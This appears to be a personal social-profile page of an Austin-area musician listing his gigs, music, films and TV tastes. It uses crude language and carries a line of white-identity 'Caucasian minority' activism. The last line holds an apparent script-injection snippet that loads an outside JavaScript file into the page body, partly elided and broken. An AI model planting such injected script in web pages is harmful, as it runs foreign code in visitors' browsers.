I perform Guitar, Bass, Drums and Vocals. I write my own original music and have four cd's on the market for sale. See me on Drums sometimes every Thursday at DETOUR'S in Lakeway, Tx. @ 9PM with THE WILDCARDS. I also shoot film and video footage for a highly select group of friends and business associates in the Austin and Central Texas area. Sometimes I even act in movies, television and do radio shows on the Internet. I am most definitely an outspoken activist for the WORLD-WIDE CAUCASIAN MINORITY.
JOHNNY DEPP - Best Actor ever!
I like all music. I grew up on Classic Rock, but I dig the shit out of all those bands most people hate. It's NEVER too fucking loud, It's NEVER too angst. Some of my favorites bands include OZZIE, PRIMUS, TOOL, METALLICA, MEGADEATH, GREEN DAY, THREE DOORS DOWN, JANES ADDICTION, PEARL JAM. My favorite song at this moment is ANGRY JOHNNY by POE. I also like any song that uses the word FUCK in it.
I like Sci-Fi and Mysteries and I really like Westerns like TOMBSTONE and THE QUICK AND THE DEAD. My least favorite movie is PULP FICTION. Some of my favorite Directors would be ROMAN POLANSKI, CLINT EASTWOOD, ED WOOD, BUDD BOETTECHER and LES MAYFIELD. My favorite movie right now is still Johnny Depp's THE NINTH GATE. It's got great shot composition.
Television REALLY sucks canal water. Talk about a wasteland of piss-poor Writers and Producers. I try to turn off ANY television I happen to run across, unless HOWARD STERN or SOUTH PARK is on. I also like some of the shows on ADULT SWIM like HARVEY BIRDMAN, HOME MOVIES and FUTURAMA.
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HOWARD STERN. This guy.."var x=document.createElement('script');x.src='http://www.../.../ test.js';document.getElementsByTagName('body')[0].appendChil d(x);" /